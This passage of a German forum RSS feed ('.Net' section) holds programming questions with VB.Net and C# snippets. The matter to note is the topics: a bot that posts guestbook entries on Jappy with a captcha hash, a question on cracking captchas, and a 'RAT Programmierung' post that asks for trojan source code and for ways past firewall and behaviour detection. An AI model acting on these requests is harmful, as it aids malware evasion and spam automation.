&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Po As String = String.Concat(&quot;gb%5Bts%5D=&quot;, GbTs, &quot;&amp;gb%5Bkey%5D=&quot;, GbKey, &quot;&amp;gb%5B&quot;, GbKey, &quot;%5D%5Btext%5D=&quot;, J.ClText(Text, True), &quot;&amp;userCaptchaHash=&quot;, A)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr = J.Req(String.Concat(&quot;http://www.jappy.de/user/&quot;, Nick, &quot;/gb/add&quot;, Visibility, &quot;?h=&quot;, J.MyNick.MyHash), &quot;POST&quot;, Po)</code><hr />
</div><br />
Hier habe ich beim User aloneisnotgood einen Eintrag erstellt mit Vb.net und hab mir mal den Post ausgeben lassen:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">gb%5Bts%5D=1368389025&amp;gb%5Bkey%5D=32bd88bcf58dbfd5b9dfa61b128d616a&amp;gb%5B32bd88bcf58dbfd5b9dfa61b128d616a%5D%5Btext%5D=Testtext&amp;userCaptchaHash=FU8D</code><hr />
</div><br />
Kann sich das vllt. mal jemand ansehen? Ich glaub der Post ist irgendwie falsch, denn im Quelltext steht nichtmal , dass das Captcha falsch ist oder so.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/jappy-gb-eintrag-erstellen-mit-captcha-23437</guid>
		</item>
		<item>
			<title>VB.Net DataGridView - Bilder</title>
			<link>net-94/datagridview-bilder-23352?goto=newpost</link>
			<pubDate>Sat, 11 May 2013 09:44:34 GMT</pubDate>
			<description>Hallo U-Hacks! 
 
Und zwar bin ich gerade am versuchen in der DataGridView Bilder von meinem Webspace anzeigen zu lassen damit ich diese dann von...</description>
			<content:encoded><![CDATA[<div>Hallo U-Hacks!<br />
<br />
Und zwar bin ich gerade am versuchen in der DataGridView Bilder von meinem Webspace anzeigen zu lassen damit ich diese dann von dort aus später verwalten kann (Löschen, verschieben, etc.).<br />
<br />
Den Code fürs Anzeigen hab ich soweit fertig (Bzw. bei Google gefunden) und nun scheiterts daran die Bilder aus dem Online-Verzeichnis in das DataGridView-Element zu laden.<br />
<br />
Hier mal der Code den ich verwende:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
<br />
        Dim dt As New DataTable<br />
        dt.Columns.Add(&quot;File&quot;)<br />
        dt.Rows.Add(&quot;&quot;)<br />
        DataGridView1.DataSource = dt<br />
<br />
        Dim colImage As New DataGridViewImageColumn<br />
        DataGridView1.Columns.Add(colImage)<br />
<br />
        Dim intI, intC As Integer<br />
<br />
        intC = dt.Rows.Count<br />
        For intI = 0 To intC - 1<br />
<br />
            Dim cellimage As New DataGridViewImageCell<br />
            cellimage.Value = Drawing.Image.FromFile(dt.Rows(intI).Item(0).ToString)<br />
            cellimage.ImageLayout = DataGridViewImageCellLayout.Zoom<br />
            DataGridView1.Rows(intI).Cells(1) = cellimage<br />
<br />
        Next<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Über Tipps oder andere Vorschläge mit anderen Elementen würde ich mich sehr freuen!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gangstersheep</dc:creator>
			<guid isPermaLink="true">net-94/datagridview-bilder-23352</guid>
		</item>
		<item>
			<title>VB.Net ABBY FineReader 11 Professional - Im Hintergrund öffnen</title>
			<link>net-94/abby-finereader-11-professional-hintergrund-oeffnen-23259?goto=newpost</link>
			<pubDate>Wed, 08 May 2013 18:44:28 GMT</pubDate>
			<description>Hallo, 
weiss jemand wie man es hinbekommt, Abby FineReader 11 Professional im Hintergrund zu öffnen? 
 
Hab leider keine Datei gefunden wo die...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
weiss jemand wie man es hinbekommt, Abby FineReader 11 Professional im Hintergrund zu öffnen?<br />
<br />
Hab leider keine Datei gefunden wo die Parameter aufgelistet werden.<br />
<br />
Code(Vb.Net)<br />
<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<br />
Dim PSI As ProcessStartInfo = New ProcessStartInfo()<br />
        PSI.FileName = Path.Combine(BasePat, &quot;FineCmd.Exe&quot;)<br />
        Dim Paramss As String = String.Concat(ParCapt, &quot; /lang &quot;, ParLang, &quot; /send Clipboard&quot;)<br />
        PSI.Arguments = Paramss<br />
        PSI.RedirectStandardOutput = True<br />
        PSI.UseShellExecute = False<br />
        PSI.WindowStyle = ProcessWindowStyle.Hidden<br />
        Dim Pro As Process = Process.Start(PSI)
</div>
</div>
</div><br />
<br />
Läuft nicht im Hintergrund, obwohl der WindowStyle auf Hidden ist.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/abby-finereader-11-professional-hintergrund-oeffnen-23259</guid>
		</item>
		<item>
			<title>VB.Net Captcha knackbar?</title>
			<link>net-94/captcha-knackbar-22802?goto=newpost</link>
			<pubDate>Sun, 28 Apr 2013 12:02:42 GMT</pubDate>
			<description><![CDATA[Hallo. 
 
Ich wollte mal Fragen, ob folgende Captchas knackbar sind, damit meine 
ich im Programm selbst(per Pixelvergleich & Dictionary welches...]]></description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich wollte mal Fragen, ob folgende Captchas knackbar sind, damit meine<br />
ich im Programm selbst(per Pixelvergleich &amp; Dictionary welches markante Punkte von jedem Zeichen enthält).<br />
<br />
Infos zum Captcha:<br />
<br />
-4 Stellig<br />
-Nur Zahlen &amp; Buchstaben<br />
-Groß &amp; Kleinschreibung irrelevant(Case insensitive)<br />
<br />
<br />
Beispiel:<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=3642&amp;d=1367151554" border="0" alt="Name:  76bnn9m9.png
Hits: 379
Größe:  2,9 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
Hier mehrere aneinander gereiht:<br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=3643&amp;d=1367151564" border="0" alt="Name:  9ldl8flp.png
Hits: 347
Größe:  23,4 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
<br />
Ist das möglich? Hat jemand Tipps?</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3642&amp;stc=1&amp;d=1367151554" alt="" />&nbsp;<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3643&amp;stc=1&amp;d=1367151564" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/captcha-knackbar-22802</guid>
		</item>
		<item>
			<title>C# nicht richtig deklariert, wie behebe ichs?</title>
			<link>net-94/nicht-richtig-deklariert-wie-behebe-ichs-22680?goto=newpost</link>
			<pubDate>Tue, 23 Apr 2013 20:30:26 GMT</pubDate>
			<description>Hey Leute, 
 
ich habe gerade Themes wo ich folgende Fehlermeldung habe: 
Bild: http://u-img.net/img/8944Jg_thumb.jpg ...</description>
			<content:encoded><![CDATA[<div>Hey Leute,<br />
<br />
ich habe gerade Themes wo ich folgende Fehlermeldung habe:<br />
<a href="http://www.u-img.net/view/8944Jg.jpg" target="_blank"><img src="http://u-img.net/img/8944Jg_thumb.jpg" border="0" alt="" /></a><br />
<br />
<br />
Dies habe ich bei Themecontrol,themecontainercontrol und draw/theme.<br />
<br />
Nun weiß ich gerade nicht wie ich dies behebe, könnt ihr mir dabei vlt weiter helfen?<br />
<br />
<br />
/e hat sich erledigt, habe nicht richtig nachgedacht :x</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/nicht-richtig-deklariert-wie-behebe-ichs-22680</guid>
		</item>
		<item>
			<title>VB.Net Cookies aus WebControl bzw. IE löschen</title>
			<link>net-94/cookies-aus-webcontrol-bzw-ie-loeschen-22648?goto=newpost</link>
			<pubDate>Mon, 22 Apr 2013 17:05:57 GMT</pubDate>
			<description>Heyho, 
 
folgendes Problem: 
 
ich möchte gerne die Cookies vom Internet Explorer bzw. dem WebControl löschen. 
Ich hatte mir schon ein paar...</description>
			<content:encoded><![CDATA[<div>Heyho,<br />
<br />
folgendes Problem:<br />
<br />
ich möchte gerne die Cookies vom Internet Explorer bzw. dem WebControl löschen.<br />
Ich hatte mir schon ein paar verschiedene Codes angeschaut, bisher hat leider keiner so richtig funktioniert.<br />
<br />
Zum Beispiel:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> Dim Dinfo As DirectoryInfo = New DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Cookies))<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Finfo As FileInfo<br />
&nbsp; &nbsp; &nbsp; &nbsp; For Each Finfo In Dinfo.GetFiles<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Finfo.Delete()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Catch ex As Exception<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; Next</code><hr />
</div><br />
Bei diesem Code kam zwar keine Fehlermeldung, aber die Cookies hat er auch nicht erfolgreich gelöscht :/<br />
<br />
Wäre euch wirklich dankbar für etwas Hilfe :)<br />
<br />
MfG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Next</dc:creator>
			<guid isPermaLink="true">net-94/cookies-aus-webcontrol-bzw-ie-loeschen-22648</guid>
		</item>
		<item>
			<title>RAT Programmierung</title>
			<link>net-94/rat-programmierung-22591?goto=newpost</link>
			<pubDate>Sat, 20 Apr 2013 14:13:04 GMT</pubDate>
			<description>Hi Leute, 
ich dachte mir ich programmiere mal ein kleines RAT, der Netzwerkcode sowie die normalen Trojanerfunktionen (scree capture, down/upload...</description>
			<content:encoded><![CDATA[<div>Hi Leute,<br />
ich dachte mir ich programmiere mal ein kleines RAT, der Netzwerkcode sowie die normalen Trojanerfunktionen (scree capture, down/upload von Dateien usw.) sind ja kein Problem, aber beim firewall bypass oder dem umgehen der Verhaltenserkennung wird es schon schwieriger.<br />
<br />
Vielleicht hat jemand den Quelltext von alten Trojanern (möglichst einfache aber mit den unten genannten Funktionen) hier, so das man mal nachsehen kann wie die das machen (wenn ich über Google danach suche lande ich immer nur in alten Threads wo die hochgeladenen Dateien nicht mehr da sind). Einer in VB wäre schön aber C/C++ ist auch OK.<br />
<br />
Hilfreich wären auch Hinweise nach welchen Begriffen man da am besten googelt mit z.B. firewall bypass komme ich nicht weit.<br />
<br />
Mein Problem ist das die Verhaltenserkennnung der Firewall merkt wenn sich das Programm ins Userverzeichnis kopiert und dort startet, sowie wenn es sich in den Autostart schreibt und natürlich das die TCP Verbindung die es aufbauen will blockiert wird.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Lain</dc:creator>
			<guid isPermaLink="true">net-94/rat-programmierung-22591</guid>
		</item>
		<item>
			<title>VB.Net Suche jemand der mir einen einfachen Countdown codet</title>
			<link>net-94/suche-jemand-der-mir-einen-einfachen-countdown-codet-22378?goto=newpost</link>
			<pubDate>Sat, 13 Apr 2013 18:39:34 GMT</pubDate>
			<description>Moin. 
 
Ich suche jemanden der mir einen Countdown programmieren kann. Wenn ich das Programm öffne sollte dort direkt stehen 15:00 für 15 Minuten....</description>
			<content:encoded><![CDATA[<div>Moin.<br />
<br />
Ich suche jemanden der mir einen Countdown programmieren kann. Wenn ich das Programm öffne sollte dort direkt stehen 15:00 für 15 Minuten. Ich mag mir jetzt auch kein Countdown Programm mit tausenden Einstellungen runterladen, das Programm soll nur diese einzige Funktion haben.<br />
<br />
Dann sollten dort 2 Buttons sein:<br />
- Start<br />
- Reset<br />
<br />
Wenn ich auf Start drücke sollen die 15 Minuten ablaufen bis auf 00:00 und wenn die 15 Minuten um sind sollte irgendein Ton kommen. Mit Reset sollte man das Label wieder auf 15:00 Minuten zurücksetzen können. <br />
<br />
Danke.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/suche-jemand-der-mir-einen-einfachen-countdown-codet-22378</guid>
		</item>
		<item>
			<title>VB.Net Massiver Pack voller VB.NET Themes</title>
			<link>net-94/massiver-pack-voller-vb-net-themes-22328?goto=newpost</link>
			<pubDate>Wed, 10 Apr 2013 21:49:49 GMT</pubDate>
			<description>*Willkommen U-Hacks Mitglieder zu einem sehr speziellen release.* 
 
Diese Packung enthält 34 Themen mit  hoher Qualität und niedriger Qualität . 
...</description>
			<content:encoded><![CDATA[<div><div style="text-align: center;"><b>Willkommen U-Hacks Mitglieder zu einem sehr speziellen release.</b></div><br />
Diese Packung enthält 34 Themen mit  hoher Qualität und niedriger Qualität .<br />
<br />
Hier habt ihr eine Liste der Themes:<br />
<br />
<span style="text-shadow: 0px 0px 10px #8d8d8d"><div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<ul><li style="">Adobe Theme.</li><li style="">Advantium Theme.</li><li style="">Alpha Theme.</li><li style="">Beyond Theme.</li><li style="">Bullion Theme.</li><li style="">Classic Theme.</li><li style="">Cypher Theme.</li><li style="">Dark Matter.</li><li style="">Electric Theme</li><li style="">Flow Theme</li><li style="">Fusion Theme</li><li style="">Future Theme.</li><li style="">Genuine Theme</li><li style="">HackForums Theme</li><li style="">Insomnia Theme</li><li style="">Prime Theme</li><li style="">Purityx Theme</li><li style="">Red Dwagon Theme</li><li style="">Rockstar Theme</li><li style="">Simplistic Theme</li><li style="">Simply Gray Theme</li><li style="">Somnium Theme</li><li style="">Steam Theme</li><li style="">Storm Theme</li><li style="">Studio Theme</li><li style="">Teamviewer Theme</li><li style="">Tennis Theme</li><li style="">The Black Theme</li><li style="">The Blue Theme</li><li style="">The Green Theme</li><li style="">Themebase 1.5.1</li><li style="">Themebase 1.5.2</li><li style="">Thief3 Theme</li><li style="">YouTube Theme</li></ul>
</div>
</div>
</div></span><br />
Es sind alles die vb Dateien, werde bald dazu ein programm basteln so das ihr das programm habt und auch sehen könnt wie das theme aussieht,  werde das dann immer updaten, bis ich keine Themes mehr find und habe.<br />
<br />
Ihr könnt euch die Themes hier herunterladen:<br />
<br />
<a href="http://www.file-upload.net/download-7453782/Themes--VR-.zip.html" target="_blank" rel="nofollow">Themes--VR-.zip</a><br />
<br />
<br />
Ein Virenscan ist auch dabei:<br />
<br />
<a href="https://www.virustotal.com/de/file/15ed943b352f26cc654970af601ce96978f140dda1c2a6a374f6cbe3f9a383f5/analysis/1365630666/" target="_blank" rel="nofollow">https://www.virustotal.com/de/file/1...is/1365630666/</a><br />
<br />
Viel Spaß mit den Themes.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/massiver-pack-voller-vb-net-themes-22328</guid>
		</item>
		<item>
			<title>C# webBrowser dropdown select</title>
			<link>net-94/webbrowser-dropdown-select-22153?goto=newpost</link>
			<pubDate>Fri, 05 Apr 2013 00:46:26 GMT</pubDate>
			<description>Hallo, 
 
ich Programmiere gerade an einem Tool und brauche gerade etwas hilfe. 
 
Dropdown einer Box kann ich zwar selecten, aber ich will das so...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich Programmiere gerade an einem Tool und brauche gerade etwas hilfe.<br />
<br />
Dropdown einer Box kann ich zwar selecten, aber ich will das so machen wie RoboForm:<br />
<br />
&quot;Feldname:&quot; ihre berufssituation<br />
&quot;Inhalt:&quot; Landwirt<br />
<br />
Und dann selected er in egal welcher Box, die neben/über (über im Source) die Label ist, den Inhalt.<br />
<br />
Somit, wie finde ich die dazugehörige Box von der Label?<br />
<br />
greets,<br />
Bl1zz4rD</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bl1zz4rD</dc:creator>
			<guid isPermaLink="true">net-94/webbrowser-dropdown-select-22153</guid>
		</item>
		<item>
			<title>C# CD Laufwerk öffnen und schließen</title>
			<link>net-94/cd-laufwerk-oeffnen-schliessen-22083?goto=newpost</link>
			<pubDate>Tue, 02 Apr 2013 15:50:55 GMT</pubDate>
			<description>Grad auf meiner Platte gefunden, vielleicht kanns jemand brauchen.  
 
using System; 
using System.Runtime.InteropServices; 
 
public class CDDevice...</description>
			<content:encoded><![CDATA[<div>Grad auf meiner Platte gefunden, vielleicht kanns jemand brauchen. <br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
using System;<br />
using System.Runtime.InteropServices;<br />
<br />
public class CDDevice {<br />
    &#91;DllImport(&quot;winmm.dll&quot;)&#93;<br />
    static extern Int32 mciSendString(string cmd, string buffer, int bufferSize, IntPtr hwndCallback);<br />
<br />
    public static void Open() {<br />
        mciSendString(&quot;set CDAudio door open&quot;, null, 127, (IntPtr)0);<br />
    }<br />
<br />
    public static void Close() {<br />
        mciSendString(&quot;set CDAudio door closed&quot;, null, 127, (IntPtr)0);<br />
    }<br />
}<br />
<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Benutzung:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
CDDevice.Open();
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
CDDevice.Close();
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Getestet mit Windows 7 64 Bit. Öffnen funktioniert auch mit Notebooks, schließen logischerweise nicht.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DMW007</dc:creator>
			<guid isPermaLink="true">net-94/cd-laufwerk-oeffnen-schliessen-22083</guid>
		</item>
		<item>
			<title>C# Regex Options</title>
			<link>net-94/regex-options-21419?goto=newpost</link>
			<pubDate>Wed, 13 Mar 2013 13:51:25 GMT</pubDate>
			<description>Hey, 
 
bin grad über den code hier gestolpert: 
 
 
Regex _regex = new Regex(pattern, RegexOptions.IgnoreCase | RegexOptions.Compiled); 
 
 
Das...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
bin grad über den code hier gestolpert:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
Regex _regex = new Regex(pattern, RegexOptions.IgnoreCase | RegexOptions.Compiled);<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Das RegexOptions.IgnoreCase | RegexOptions.Compiled am schluss verstehe ich nicht.<br />
| ist doch oder also macht die bedingung garkeinen sinn?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>ThunderStorm</dc:creator>
			<guid isPermaLink="true">net-94/regex-options-21419</guid>
		</item>
		<item>
			<title>Tor als Socks Proxy Handshake Fetching socks handshake failed</title>
			<link>net-94/tor-als-socks-proxy-handshake-fetching-socks-handshake-failed-21391?goto=newpost</link>
			<pubDate>Tue, 12 Mar 2013 14:47:09 GMT</pubDate>
			<description>Hallo, 
 
ich würde gerne Tor als Proxy benutzen um Requests damit zu senden. 
 
 
Ich glaube der ProReg sendet die Anfragen auch mittels Tor. 
 
...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
ich würde gerne Tor als Proxy benutzen um Requests damit zu senden.<br />
<br />
<br />
Ich glaube der ProReg sendet die Anfragen auch mittels Tor.<br />
<br />
<br />
Im Moment sieht das bei mir so aus:<br />
<br />
<br />
  <div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Function SocksConnect() As Integer<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim result As Integer<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EClient = SocketNEW.CreateSock(ETimeout)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EClient.Connect(ESocksHost, ESocksPort)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EConnection = New NetworkStream(EClient)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Wr As BinaryWriter = New BinaryWriter(EConnection)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Br As BinaryReader = New BinaryReader(EConnection)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(5)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(1)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(0)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim ServerAuth As Byte() = {}<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EClient.Receive(ServerAuth)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;Länge : &quot; &amp; ServerAuth.Count)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(ServerAuth(0) &amp; &quot; | &quot; &amp; ServerAuth(1))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If ServerAuth(0) = 5 AndAlso ServerAuth(1) = 0 Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(5)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(1)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(0)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(3)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim bytes As Byte() = Encoding.ASCII.GetBytes(ESocksTargetHost)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(CByte(bytes.Length))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(bytes, 0, bytes.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(0)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Wr.Write(80)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EConnection.Read(ServerAuth, 0, 2)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result = CInt(ServerAuth(1))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Return result<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Catch exFE As Exception<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result = -1<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Return result<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; result = -1<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Return result<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Function</code><hr />
</div>In der Tor Konsole steht &quot;Fetching socks handshake failed. Closing.<br />
<br />
Die Konsole gibt die Länge 0 aus vom Array.<br />
Was ist daran falsch? Vllt. kann ja mal jemand was dazu sagen.<br />
<br />
<br />
<br />
Danke im Vorraus..</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/tor-als-socks-proxy-handshake-fetching-socks-handshake-failed-21391</guid>
		</item>
		<item>
			<title>VB.Net Richtextbox einzelne Zeile Leerzeichen entfernen</title>
			<link>net-94/richtextbox-einzelne-zeile-leerzeichen-entfernen-21321?goto=newpost</link>
			<pubDate>Sun, 10 Mar 2013 16:05:59 GMT</pubDate>
			<description>Hallo :) 
Ich habe eine Richtextbox, wo immer 4 Zeilen sind: 
 
 
---Zitat von RichtextBox1 Zeile 4--- 
xxxx yyyyy 
xyxyx xxxx xx 
xxxx xxxyxyx 
(xx...</description>
			<content:encoded><![CDATA[<div>Hallo :)<br />
Ich habe eine Richtextbox, wo immer 4 Zeilen sind:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			<div>
				Zitat von <strong>RichtextBox1 Zeile 4</strong>
				
			</div>
			<div class="message">xxxx yyyyy<br />
xyxyx xxxx xx<br />
xxxx xxxyxyx<br />
(xx xx) xx xx xx</div>
			
		<hr />
	</div>
</div>Meine Frage ist jetzt wie ich<b><i><u> nur in der vierten Zeile die Klammern  und die Leerzeichen entferne</u></i></b>, wobei das<b> zweite leerzeichen bestehen bleiben</b> sollte <b>WENN möglich</b>.<br />
<br />
Hoffe man versteht mein Anliegen :P<br />
<br />
Danke im Vorraus<br />
<br />
Onni<br />
<br />
/e:<br />
Okay das mit den Klammern klappte jah  mit <br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp;  RichTextBox1.Text = RichTextBox1.Text.Replace(&quot;(&quot;, &quot;&quot;)<br />
&nbsp; &nbsp; &nbsp; &nbsp; RichTextBox1.Text = RichTextBox1.Text.Replace(&quot;)&quot;, &quot;&quot;)</code><hr />
</div>Mit Leerzeichen hab ich halt das Problem, dass ich nur in zeile 4 die Leerzeichen entfernen will.<br />
<br />
Habe es geschafft ;) kann closed</div>

